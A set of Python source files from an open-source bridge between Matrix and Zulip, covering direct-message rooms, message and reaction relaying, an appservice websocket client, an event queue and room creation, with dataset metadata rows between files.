# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import asyncio
import logging
from typing import TYPE_CHECKING, Optional
from bidict import bidict
from mautrix.types import MessageType
from zulip_emoji_mapping import EmojiNotFoundException, ZulipEmojiMapping
from matrixzulipbridge.command_parse import (
CommandManager,
CommandParser,
CommandParserError,
)
from matrixzulipbridge.room import InvalidConfigError
from matrixzulipbridge.under_organization_room import UnderOrganizationRoom, connected
if TYPE_CHECKING:
import zulip
from mautrix.types import (
EventID,
MessageEvent,
ReactionEvent,
RedactionEvent,
UserID,
)
from matrixzulipbridge.organization_room import OrganizationRoom
from matrixzulipbridge.types import ZulipMessageID, ZulipUserID
class DirectRoom(UnderOrganizationRoom):
name: str
media: list[list[str]]
recipient_ids: list["ZulipUserID"]
max_backfill_amount: int
lazy_members: dict
messages: bidict["ZulipMessageID", "EventID"]
reactions: bidict["EventID", frozenset]
commands: CommandManager
def init(self) -> None:
super().init()
self.name = None
self.media = []
self.recipient_ids = []
self.max_backfill_amount = None
self.messages = bidict()
self.reactions = bidict()
self.commands = CommandManager()
cmd = CommandParser(
prog="BACKFILL",
description="set the maximum amount of backfilled messages (0 to disable backfilling)",
)
cmd.add_argument("amount", nargs="?", help="new amount")
cmd.add_argument("--now", action="store_true", help="start backfilling now")
self.commands.register(cmd, self.cmd_backfill)
self.mx_register("m.room.message", self.on_mx_message)
self.mx_register("m.room.redaction", self.on_mx_redaction)
self.mx_register("m.reaction", self.on_mx_reaction)
def from_config(self, config: dict) -> None:
super().from_config(config)
if "name" not in config:
raise InvalidConfigError("No name key in config for ChatRoom")
self.name = config["name"]
if "media" in config:
self.media = config["media"]
if "max_backfill_amount" in config:
self.max_backfill_amount = config["max_backfill_amount"]
if "recipient_ids" in config:
self.recipient_ids = config["recipient_ids"]
if "messages" in config and config["messages"]:
self.messages = bidict(config["messages"])
if "reactions" in config and config["reactions"]:
self.reactions = bidict(
{
k: frozenset({l[0]: l[1] for l in v}.items())
for k, v in config["reactions"].items()
}
)
def to_config(self) -> dict:
return {
**(super().to_config()),
"name": self.name,
"organization_id": self.organization_id,
"media": self.media[:5],
"max_backfill_amount": self.max_backfill_amount,
"recipient_ids": self.recipient_ids,
"messages": dict(self.messages),
"reactions": {k: list(v) for k, v in self.reactions.items()},
}
@staticmethod
async def create(
organization: "OrganizationRoom",
        zulip_recipients: list[dict],
) -> "DirectRoom":
logging.debug(
f"DirectRoom.create(organization='{organization.name}', recipients='{zulip_recipients}'"
)
mx_recipients = []
for user in zulip_recipients:
if str(user["id"]) in organization.zulip_puppet_user_mxid:
mxid = organization.zulip_puppet_user_mxid[str(user["id"])]
else:
mxid = organization.serv.get_mxid_from_zulip_user_id(
organization, user["id"]
)
if "full_name" in user:
await organization.serv.cache_user(mxid, user["full_name"])
mx_recipients.append(mxid)
room = DirectRoom(
None,
organization.user_id,
organization.serv,
mx_recipients,
[],
)
room.name = ", ".join([user["full_name"] for user in zulip_recipients])
room.organization = organization
room.organization_id = organization.id
room.max_backfill_amount = organization.max_backfill_amount
room.recipient_ids = [user["id"] for user in zulip_recipients]
organization.serv.register_room(room)
recipient_ids = frozenset(room.recipient_ids)
organization.direct_rooms[recipient_ids] = room
asyncio.ensure_future(room.create_mx(mx_recipients))
return room
async def create_mx(self, user_mxids: list["UserID"]) -> None:
if self.id is None:
self.id = await self.organization.serv.create_room(
f"{self.name} ({self.organization.name})",
f"Direct messages with {self.name} from {self.organization.name}",
user_mxids,
is_direct=True,
)
self.serv.register_room(self)
for user_mxid in user_mxids:
if self.serv.is_puppet(user_mxid):
await self.az.intent.user(user_mxid).ensure_joined(self.id)
await self.save()
# start event queue now that we have an id
self._queue.start()
# attach to organization space
if self.organization.space:
await self.organization.space.attach(self.id)
def is_valid(self) -> bool:
if self.organization_id is None:
return False
if self.name is None:
return False
if len(self.recipient_ids) == 0:
return False
return True
def cleanup(self) -> None:
logging.debug(f"Cleaning up organization connected room {self.id}.")
# cleanup us from organization space if we have it
if self.organization and self.organization.space:
asyncio.ensure_future(self.organization.space.detach(self.id))
# cleanup us from organization rooms
if self.organization and self.name in self.organization.rooms:
logging.debug(
f"... and we are attached to organization {self.organization.id}, detaching."
)
del self.organization.rooms[self.name]
super().cleanup()
def send_notice(
self,
text: str,
user_id: Optional["UserID"] = None,
formatted=None,
fallback_html: Optional[str] = None,
forward=False,
):
if (self.force_forward or forward) and user_id is None:
self.organization.send_notice(
text=f"{self.name}: {text}",
formatted=formatted,
fallback_html=fallback_html,
)
else:
super().send_notice(
text=text,
user_id=user_id,
formatted=formatted,
fallback_html=fallback_html,
)
def send_notice_html(
self, text: str, user_id: Optional["UserID"] = None, forward=False
) -> None:
if (self.force_forward or forward) and user_id is None:
self.organization.send_notice_html(text=f"{self.name}: {text}")
else:
super().send_notice_html(text=text, user_id=user_id)
@connected
async def on_mx_message(self, event: "MessageEvent") -> None:
await self.check_if_nobody_left()
sender = str(event.sender)
(name, server) = sender.split(":", 1)
# ignore self messages
if sender == self.serv.user_id:
return
# prevent re-sending federated messages back
if (
name.startswith("@" + self.serv.puppet_prefix)
and server == self.serv.server_name
):
return
if event.content.msgtype.is_media or event.content.msgtype in (
MessageType.EMOTE,
MessageType.TEXT,
MessageType.NOTICE,
):
await self._relay_message(event)
await self.az.intent.send_receipt(event.room_id, event.event_id)
@connected
async def on_mx_redaction(self, event: "RedactionEvent"):
event_id = event.redacts
client = self.organization.zulip_puppets.get(event.sender)
if event_id in self.messages.inverse:
zulip_message_id = self.messages.inverse[event_id]
result = client.delete_message(zulip_message_id)
del self.messages.inverse[event_id]
elif event_id in self.reactions:
reaction = {i[0]: i[1] for i in self.reactions[event_id]}
request = {
"message_id": reaction["message_id"],
"emoji_name": reaction["emoji_name"],
}
result = client.remove_reaction(request)
zulip_user_id = self.organization.zulip_puppet_user_mxid.inverse[
event.sender
]
request["user_id"] = str(zulip_user_id)
frozen_request = frozenset(request.items())
del self.reactions.inverse[frozen_request]
else:
return
if result["result"] != "success":
logging.debug(f"Couldn't redact event on Zulip: {result['msg']}")
@connected
async def on_mx_reaction(self, event: "ReactionEvent"):
client = self.organization.zulip_puppets.get(event.sender)
# This only works for logged in users
if not client:
return
if event.content.relates_to.rel_type.value != "m.annotation":
return
zulip_user_id = self.organization.zulip_puppet_user_mxid.inverse[event.sender]
reaction = event.content.relates_to.key
try:
emoji_name = ZulipEmojiMapping.get_emoji_name(reaction)
except EmojiNotFoundException:
emoji_name = reaction
event_id = event.content.relates_to.event_id
zulip_message_id = self.messages.inverse.get(event_id)
if not zulip_message_id:
logging.error(
f"Could not find a message to react to for {event_id}. Was it sent to Zulip?"
)
return
request = {
"message_id": zulip_message_id,
"emoji_name": emoji_name,
}
result = client.add_reaction(request)
if result["result"] != "success":
logging.debug(f"Failed adding reaction {emoji_name} to {zulip_message_id}!")
return
request["user_id"] = str(zulip_user_id)
frozen_request = frozenset(request.items())
if frozen_request in self.reactions.inverse:
del self.reactions.inverse[frozen_request]
self.reactions[event.event_id] = frozen_request
async def _relay_message(self, event: "MessageEvent"):
prefix = ""
client = self.organization.zulip_puppets.get(event.sender)
if not client:
logging.error(
f"Matrix user ({event.sender}) sent a DM without having logged in to Zulip"
)
return
# try to find out if this was a reply
reply_to = None
if event.content.get_reply_to():
rel_event = event
# traverse back all edits
while rel_event.content.get_edit():
rel_event = await self.az.intent.get_event(
self.id, rel_event.content.get_edit()
)
# see if the original is a reply
if rel_event.content.get_reply_to():
reply_to = await self.az.intent.get_event(
self.id, rel_event.content.get_reply_to()
)
# keep track of the last message
self.last_messages[event.sender] = event
message = await self._process_event_content(event, prefix, reply_to)
request = {
"type": "private",
"to": self.recipient_ids,
"content": message,
}
result = client.send_message(request)
if result["result"] != "success":
logging.error(f"Failed sending message to Zulip: {result['msg']}")
return
self.messages[str(result["id"])] = event.event_id
await self.organization.save()
await self.save()
async def _flush_event(self, event: dict):
if event["type"] == "_zulip_react":
intent = self.az.intent.user(event["user_id"])
message_event_id = event["event_id"]
request = {
"message_id": event["zulip_message_id"],
"emoji_name": event["zulip_emoji_name"],
"user_id": event["zulip_user_id"],
}
frozen_request = frozenset(request.items())
# Check if this reaction has already been relayed
if self.reactions.inverse.get(frozen_request) is not None:
return
event_id = await intent.react(self.id, message_event_id, event["key"])
self.reactions[event_id] = frozen_request
await self.save()
else:
await super()._flush_event(event)
def relay_zulip_react(
self,
user_id: "UserID",
event_id: "EventID",
key: str,
zulip_message_id: "ZulipMessageID",
zulip_emoji_name: str,
zulip_user_id: "ZulipUserID",
):
self._queue.enqueue(
{
"type": "_zulip_react",
"user_id": user_id,
"event_id": event_id,
"key": key,
"zulip_message_id": zulip_message_id,
"zulip_emoji_name": zulip_emoji_name,
"zulip_user_id": zulip_user_id,
}
)
async def check_if_nobody_left(self):
"""Invite back everyone who left"""
mx_recipients = []
for user_id in self.recipient_ids:
if str(user_id) not in self.organization.zulip_puppet_user_mxid:
continue
mx_recipients.append(self.organization.zulip_puppet_user_mxid[str(user_id)])
for mxid in mx_recipients:
if mxid in self.members:
continue
await self.az.intent.invite_user(self.id, mxid)
async def cmd_backfill(self, args) -> None:
if args.amount:
self.max_backfill_amount = int(args.amount)
await self.save()
self.send_notice(
f"Maximum backfill amount is set to: {self.max_backfill_amount}"
)
if args.now:
await self.backfill_messages()
async def cmd_upgrade(self, args) -> None:
if not args.undo:
await self._attach_space()
async def backfill_messages(self):
if not self.organization.max_backfill_amount:
return
request = {
"anchor": "newest",
"num_before": self.organization.max_backfill_amount,
"num_after": 0,
"narrow": [
{"operator": "dm", "operand": self.recipient_ids},
],
}
client = self.get_any_zulip_client()
if client is None:
return
result = client.get_messages(request)
if result["result"] != "success":
logging.error(f"Failed getting Zulip messages: {result['msg']}")
return
for message in result["messages"]:
if str(message["id"]) in self.messages:
continue
if str(message["id"]) in self.organization.messages:
continue
self.organization.dm_message(message)
def get_any_zulip_client(self) -> "zulip.Client":
for recipient_id in self.recipient_ids:
mxid = self.organization.zulip_puppet_user_mxid.get(str(recipient_id))
if not mxid:
continue
client = self.organization.zulip_puppets.get(mxid)
if client is None:
continue
return client
return None
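# Sketch of the reaction bookkeeping used by to_config()/from_config() above
# (values are assumptions): each Matrix reaction event id maps to a frozenset
# of (key, value) pairs, which is hashable for the bidict and is serialized
# as a list of pairs:
#
#   request = {"message_id": "123", "emoji_name": "smile", "user_id": "7"}
#   frozen = frozenset(request.items())       # stored in self.reactions
#   as_config = list(frozen)                  # shape written by to_config()
#   restored = frozenset({p[0]: p[1] for p in as_config}.items())
#   assert restored == frozen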
| 17,173 | Python | .py | 420 | 30.4 | 100 | 0.595572 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,585 | websocket.py | GearKite_MatrixZulipBridge/matrixzulipbridge/websocket.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import asyncio
import json
import logging
import aiohttp
from mautrix.types.event import Event
class AppserviceWebsocket:
def __init__(self, url, token, callback):
self.url = url + "/_matrix/client/unstable/fi.mau.as_sync"
self.headers = {
"Authorization": f"Bearer {token}",
"X-Mautrix-Websocket-Version": "3",
}
self.callback = callback
async def start(self):
asyncio.create_task(self._loop())
async def _loop(self):
while True:
try:
logging.info(f"Connecting to {self.url}...")
async with aiohttp.ClientSession(headers=self.headers) as sess:
async with sess.ws_connect(self.url) as ws:
logging.info("Websocket connected.")
async for msg in ws:
if msg.type != aiohttp.WSMsgType.TEXT:
logging.debug("Unhandled WS message: %s", msg)
continue
data = msg.json()
if (
data["status"] == "ok"
and data["command"] == "transaction"
):
logging.debug(f"Websocket transaction {data['txn_id']}")
for event in data["events"]:
try:
await self.callback(Event.deserialize(event))
except Exception as e:
logging.error(e)
await ws.send_str(
json.dumps(
{
"command": "response",
"id": data["id"],
"data": {},
}
)
)
else:
logging.warn("Unhandled WS command: %s", data)
logging.info("Websocket disconnected.")
except asyncio.CancelledError:
logging.info("Websocket was cancelled.")
return
except Exception as e:
logging.error(e)
try:
await asyncio.sleep(5)
except asyncio.CancelledError:
return
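# Minimal usage sketch (URL and token are placeholders): the callback receives
# each event of a websocket transaction as a deserialized mautrix Event.
#
#   async def on_event(event):
#       print(event.event_id)
#
#   ws = AppserviceWebsocket("https://synapse.example.org", "as_token", on_event)
#   await ws.start()  # spawns the reconnect loop as a background task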
| 3,603 | Python | .py | 81 | 28.283951 | 95 | 0.505839 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,586 | zulip.py | GearKite_MatrixZulipBridge/matrixzulipbridge/zulip.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import logging
import re
from typing import TYPE_CHECKING, Optional
from urllib.parse import urljoin
import emoji
from bs4 import BeautifulSoup
from markdownify import markdownify
from zulip_emoji_mapping import EmojiNotFoundException, ZulipEmojiMapping
from matrixzulipbridge.direct_room import DirectRoom
from matrixzulipbridge.stream_room import StreamRoom
from matrixzulipbridge.types import ZulipUserID
if TYPE_CHECKING:
from matrixzulipbridge.organization_room import OrganizationRoom
from matrixzulipbridge.types import ZulipMessageID, ZulipStreamID
class ZulipEventHandler:
def __init__(self, organization: "OrganizationRoom") -> None:
self.organization = organization
self.messages = set()
def on_event(self, event: dict):
logging.debug(f"Zulip event for {self.organization.name}: {event}")
try:
match event["type"]:
case "message":
self._handle_message(event["message"])
case "subscription":
self._handle_subscription(event)
case "reaction":
self._handle_reaction(event)
case "delete_message":
self._handle_delete_message(event)
case "realm_user":
self._handle_realm_user(event)
case "update_message":
self._handle_update_message(event)
case _:
logging.debug(f"Unhandled event type: {event['type']}")
except Exception as e: # pylint: disable=broad-exception-caught
logging.exception(e)
def backfill_message(self, message: dict):
self._handle_message(message)
def _handle_message(self, event: dict):
if event["type"] != "stream":
return
if event["sender_id"] == self.organization.profile["user_id"]:
return # Ignore own messages
# Prevent race condition when single message is received by multiple clients
if str(event["id"]) in self.messages:
return
self.messages.add(str(event["id"]))
room = self._get_room_by_stream_id(event["stream_id"])
if not room:
logging.debug(
f"Received message from stream with no associated Matrix room: {event}"
)
return
# Skip already forwarded messages
if str(event["id"]) in room.messages:
return
topic = event["subject"]
mx_user_id = room.serv.get_mxid_from_zulip_user_id(
self.organization, event["sender_id"]
)
message, formatted_message, reply_event_id = self._process_message_content(
event["content"], room
)
custom_data = {
"zulip_topic": topic,
"zulip_user_id": event["sender_id"],
"display_name": event["sender_full_name"],
"zulip_message_id": event["id"],
"type": "message",
"timestamp": event["timestamp"],
"target": "stream",
"reply_to": reply_event_id,
}
room.send_message(
message,
formatted=formatted_message,
user_id=mx_user_id,
custom_data=custom_data,
)
async def handle_dm_message(self, event: dict):
if event["sender_id"] == self.organization.profile["user_id"]:
return # Ignore own messages
# Prevent race condition when single message is received by multiple clients
if str(event["id"]) in self.messages:
return
mx_user_id = self.organization.serv.get_mxid_from_zulip_user_id(
self.organization, event["sender_id"]
)
recipient_ids = frozenset(user["id"] for user in event["display_recipient"])
room = self.organization.direct_rooms.get(recipient_ids)
if not room:
room = await DirectRoom.create(
self.organization, event["display_recipient"]
)
# Skip already forwarded messages
if str(event["id"]) in room.messages:
return
message, formatted_message, reply_event_id = self._process_message_content(
event["content"], room
)
custom_data = {
"zulip_user_id": event["sender_id"],
"display_name": event["sender_full_name"],
"zulip_message_id": event["id"],
"type": "message",
"timestamp": event["timestamp"],
"target": "direct",
"reply_to": reply_event_id,
}
room.send_message(
message,
formatted=formatted_message,
user_id=mx_user_id,
custom_data=custom_data,
)
def _handle_reaction(self, event: dict):
zulip_message_id = str(event["message_id"])
room = self._get_room_by_message_id(zulip_message_id)
if not room:
logging.debug(f"Couldn't find room for reaction: {event}")
return
mx_user_id = room.serv.get_mxid_from_zulip_user_id(
self.organization, event["user_id"]
)
try:
reaction = ZulipEmojiMapping.get_emoji_by_name(event["emoji_name"])
except EmojiNotFoundException:
reaction = event["emoji_name"]
if event["op"] == "add":
message_event_id = room.messages[zulip_message_id]
room.relay_zulip_react(
user_id=mx_user_id,
event_id=message_event_id,
key=reaction,
zulip_message_id=zulip_message_id,
zulip_emoji_name=event["emoji_name"],
zulip_user_id=ZulipUserID(event["user_id"]),
)
elif event["op"] == "remove":
request = {
"message_id": zulip_message_id,
"emoji_name": event["emoji_name"],
"user_id": ZulipUserID(event["user_id"]),
}
frozen_request = frozenset(request.items())
event_id = room.reactions.inverse.get(frozen_request)
if event_id is None:
return
room.redact(event_id, "removed on Zulip")
del room.reactions[event_id]
def _handle_delete_message(self, event: dict):
room = self._get_room_by_stream_id(event["stream_id"])
message_mxid = self._get_mxid_from_zulip_id(event["message_id"], room)
if not message_mxid:
return
room.redact(message_mxid, reason="Deleted on Zulip")
del room.messages[str(event["message_id"])]
def _handle_subscription(self, event: dict):
if not "stream_ids" in event:
return
for stream_id in event["stream_ids"]:
room = self._get_room_by_stream_id(stream_id)
if not room:
                logging.debug(
                    f"Received subscription event for a stream with no associated Matrix room: {event}"
                )
return
match event["op"]:
case "peer_add":
for user_id in event["user_ids"]:
room.on_join(user_id)
case "peer_remove":
for user_id in event["user_ids"]:
room.on_part(user_id)
def _handle_realm_user(self, event: dict):
# Update Zulip user cache
if event["op"] == "update":
user_id = event["person"]["user_id"]
            if user_id not in self.organization.zulip_users:
return
self.organization.zulip_users[user_id] |= event["person"]
def _handle_update_message(self, event: dict):
if "orig_subject" in event:
# Message topic renamed
stream_id = event.get("stream_id")
if stream_id is None:
return
room = self._get_room_by_stream_id(stream_id)
if event["propagate_mode"] == "change_all":
thread_event_id = room.threads.get(event["orig_subject"])
if thread_event_id is None:
return
del room.threads[event["orig_subject"]]
room.threads[event["subject"]] = thread_event_id
def _get_mxid_from_zulip_id(
self, zulip_id: "ZulipMessageID", room: DirectRoom = None
):
if room is not None:
return room.messages.get(str(zulip_id))
for room in self.organization.rooms.values():
if not isinstance(room, DirectRoom):
continue
mxid = room.messages.get(str(zulip_id))
if mxid is not None:
return mxid
logging.debug(
f"Message with Zulip ID {zulip_id} not found, it probably wasn't sent to Matrix"
)
def _get_room_by_stream_id(
self, stream_id: "ZulipStreamID"
) -> Optional["StreamRoom"]:
for room in self.organization.rooms.values():
if not isinstance(room, StreamRoom):
continue
if room.stream_id == stream_id:
return room
return None
def _get_room_by_message_id(
self, message_id: "ZulipMessageID"
) -> Optional["DirectRoom"]:
for room in self.organization.rooms.values():
if not isinstance(room, DirectRoom):
continue
if message_id in room.messages:
return room
return None
def _process_message_content(self, html: str, room: "DirectRoom"):
reply_event_id = None
# Replace Zulip file upload relative URLs with absolute
soup = BeautifulSoup(html, "html.parser")
for a_tag in soup.find_all("a"):
href = a_tag.get("href")
absolute_url = urljoin(self.organization.server["realm_uri"], href)
a_tag["href"] = absolute_url
# Check if message contains a reply
first_text = soup.find("p")
mentioned_user = first_text.select("span.user-mention.silent")
narrow_link = first_text.find("a")
quote = soup.find("blockquote")
if (
len(mentioned_user) == 1
and narrow_link is not None
and narrow_link.get("href") is not None
and quote is not None
and "#narrow" in narrow_link.get("href", "")
):
# Parse reply (crudely?)
message_id = re.match(r".*\/near\/(\d+)(\/|$)", narrow_link.get("href"))[1]
reply_event_id = room.messages.get(message_id)
# Create rich reply fallback
if reply_event_id is not None:
mentioned_zulip_id = mentioned_user[0]["data-user-id"]
mentioned_user_mxid = self.organization.zulip_puppet_user_mxid.get(
mentioned_zulip_id
)
if mentioned_user_mxid is None:
mentioned_user_mxid = (
self.organization.serv.get_mxid_from_zulip_user_id(
self.organization, mentioned_zulip_id
)
)
quote.extract()
                # Format the rich reply fallback
mx_reply = soup.new_tag("mx-reply")
mx_reply_quote = soup.new_tag("blockquote")
mx_reply_event = soup.new_tag(
"a",
href=f"https://matrix.to/#/{room.id}/{reply_event_id}",
)
mx_reply_event.append(soup.new_string("In reply to"))
mx_reply_author = soup.new_tag(
"a", href=f"https://matrix.to/#/{mentioned_user_mxid}"
)
mx_reply_author.append(soup.new_string(mentioned_user_mxid))
mx_reply_quote.append(mx_reply_event)
mx_reply_quote.append(mx_reply_author)
mx_reply_quote.append(soup.new_tag("br"))
for child in quote.findChildren():
mx_reply_quote.append(child)
mx_reply.append(mx_reply_quote)
first_text.replace_with(mx_reply)
formatted_message = emoji.emojize(soup.decode(), language="alias")
message = markdownify(formatted_message).rstrip()
return message, formatted_message, reply_event_id
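# Rough shape of the conversion in _process_message_content() (the HTML below
# is a made-up Zulip rendering): relative upload links are made absolute
# against realm_uri, emoji shortcodes are emojized, and markdownify()
# produces the plain-text fallback body.
#
#   html = '<p>See <a href="/user_uploads/2/ab/x.png">x.png</a> :smile:</p>'
#   message, formatted, reply_to = handler._process_message_content(html, room)
#   # formatted: '<p>See <a href="https://zulip.example.org/user_uploads/...'
#   # message:   'See [x.png](https://zulip.example.org/user_uploads/...) 😄'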
| 13,320 | Python | .py | 309 | 31.508091 | 95 | 0.578188 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,587 | event_queue.py | GearKite_MatrixZulipBridge/matrixzulipbridge/event_queue.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import asyncio
import logging
class EventQueue:
def __init__(self, callback):
self._callback = callback
self._events = []
self._loop = asyncio.get_running_loop()
self._timer = None
self._start = 0
self._chain = asyncio.Queue()
self._task = None
self._timeout = 3600
def start(self):
if self._task is None:
self._task = asyncio.ensure_future(self._run())
def stop(self):
if self._task:
self._task.cancel()
self._task = None
async def _run(self):
while True:
try:
task = await self._chain.get()
except asyncio.CancelledError:
logging.debug("EventQueue was cancelled.")
return
try:
await asyncio.create_task(task)
except asyncio.CancelledError:
logging.debug("EventQueue task was cancelled.")
return
except asyncio.TimeoutError:
logging.warning("EventQueue task timed out.")
finally:
self._chain.task_done()
def _flush(self):
events = self._events
self._timer = None
self._events = []
self._chain.put_nowait(self._callback(events))
def enqueue(self, event):
now = self._loop.time()
# always cancel timer when we enqueue
if self._timer:
self._timer.cancel()
# stamp start time when we queue first event, always append event
if len(self._events) == 0:
self._start = now
self._events.append(event)
# if we have bumped ourself for half a second, flush now
if now >= self._start + 0.5:
self._flush()
else:
self._timer = self._loop.call_later(0.1, self._flush)
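# Behavior sketch: enqueue() debounces. Events arriving in a burst are
# coalesced and handed to the callback as one list once the queue has been
# idle for 0.1 s, or as soon as a burst has kept bumping the timer for 0.5 s.
#
#   async def flush(events):
#       print(f"flushed {len(events)} events together")
#
#   queue = EventQueue(flush)
#   queue.start()
#   queue.enqueue({"type": "_join", "user_id": "@a:example.org", "nick": "a"})
#   queue.enqueue({"type": "_join", "user_id": "@b:example.org", "nick": "b"})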
| 2,863 | Python | .py | 77 | 29.506494 | 95 | 0.632035 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,588 | appservice.py | GearKite_MatrixZulipBridge/matrixzulipbridge/appservice.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import logging
from abc import ABC, abstractmethod
from typing import TYPE_CHECKING
from mautrix.api import Method, Path
from mautrix.errors import MNotFound
if TYPE_CHECKING:
from mautrix.appservice import AppService as MauService
from mautrix.types import RoomID, UserID
from matrixzulipbridge.room import Room
class AppService(ABC):
az: "MauService"
user_id: "UserID"
server_name: str
config: dict
async def load(self):
try:
self.config.update(await self.az.intent.get_account_data("zulip"))
except MNotFound:
await self.save()
async def save(self):
await self.az.intent.set_account_data("zulip", self.config)
async def create_room(
self,
name: str,
topic: str,
invite: list["UserID"],
restricted: str = None,
permissions: dict = None,
is_direct: bool = False,
) -> "RoomID":
if permissions is None:
permissions = {}
req = {
"visibility": "private",
"name": name,
"topic": topic,
"invite": invite,
"is_direct": is_direct,
"power_level_content_override": {
"users_default": 0,
"invite": 50,
"kick": 50,
"redact": 50,
"ban": 50,
"events": {
"m.room.name": 0,
"m.room.avatar": 0, # these work as long as rooms are private
"m.room.encryption": 100,
"m.space.parent": 90,
},
"users": {self.user_id: 100} | permissions,
},
"com.beeper.auto_join_invites": True,
}
if restricted is not None:
resp = await self.az.intent.api.request(Method.GET, Path.v3.capabilities)
try:
def_ver = resp["capabilities"]["m.room_versions"]["default"]
except KeyError:
logging.debug("Unexpected capabilities reply")
def_ver = None
# If room version is in range of 1..8, request v9
if def_ver in [str(v) for v in range(1, 9)]:
req["room_version"] = "9"
req["initial_state"] = [
{
"type": "m.room.join_rules",
"state_key": "",
"content": {
"join_rule": "restricted",
"allow": [{"type": "m.room_membership", "room_id": restricted}],
},
}
]
resp = await self.az.intent.api.request(Method.POST, Path.v3.createRoom, req)
return resp["room_id"]
@abstractmethod
def register_room(self, room: "Room"):
pass
@abstractmethod
def find_rooms(self, rtype=None, user_id: "UserID" = None) -> list["Room"]:
pass
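# Usage sketch (called on a concrete subclass; the space room id and power
# levels are made up): create_room() can make a space-restricted room that
# members of an existing space may join.
#
#   room_id = await self.create_room(
#       "#general (Example)",
#       "bridged stream",
#       invite=[self.user_id],
#       restricted="!abcdef:example.org",
#       permissions={"@admin:example.org": 50},
#   )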
| 3,937 | Python | .py | 105 | 28.219048 | 95 | 0.58637 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,589 | version.py | GearKite_MatrixZulipBridge/matrixzulipbridge/version.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import os
import shutil
import subprocess
module_dir = os.path.dirname(__file__)
root_dir = module_dir + "/../"
__version__ = "0.0.0"
